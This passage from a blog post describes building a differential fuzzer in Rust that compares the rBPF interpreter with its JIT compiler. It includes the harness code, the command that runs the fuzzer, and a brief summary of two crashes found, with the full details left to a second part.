    if Executable::jit_compile(&mut executable).is_ok() {
        let interp_mem_region = MemoryRegion::new_writable(&mut interp_mem, ebpf::MM_INPUT_START);
        let mut interp_vm =
            EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], vec![interp_mem])
        let jit_mem_region = MemoryRegion::new_writable(&mut jit_mem, ebpf::MM_INPUT_START);
        let mut jit_vm =
            EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], vec![jit_mem_region])

        let mut interp_meter = TestInstructionMeter { remaining: 1 << 16 };
        let interp_res = interp_vm.execute_program_interpreted(&mut interp_meter);
        let mut jit_meter = TestInstructionMeter { remaining: 1 << 16 };
        let jit_res = jit_vm.execute_program_jit(&mut jit_meter);
        if interp_res != jit_res {
            panic!("Expected {:?}, but got {:?}", interp_res, jit_res);
        if interp_res.is_ok() {
            // we know jit res must be ok if interp res is by this point
            if interp_meter.remaining != jit_meter.remaining {
                    "Expected {} insts remaining, but got {}",
                    interp_meter.remaining, jit_meter.remaining
            if interp_mem != jit_mem {
                    "Expected different memory. From interpreter: {:?}\nFrom JIT: {:?}",
                    interp_mem, jit_mem

Theoretically, an up-to-date version is available in the rBPF repo.

And, with that, we have our fuzzer! This part of the fuzzer took approximately three hours to implement (largely due to finding several issues with the fuzzer and debugging them along the way).

At this point, we were about six hours in. I turned on the fuzzer and waited:

$ cargo +nightly fuzz run smart-jit-diff --jobs 4 -- -ignore_crashes=1

And the crashes began. Two main bugs appeared:

  1. A panic when there was an error in interpreter, but not JIT, when writing to a particular address (crash in 15 minutes)
  2. A AddressSanitizer crash from a memory leak when an error occurred just after the instruction limit was past by the JIT’d program (crash in two hours)

To read the details of these bugs, continue to Part 2.
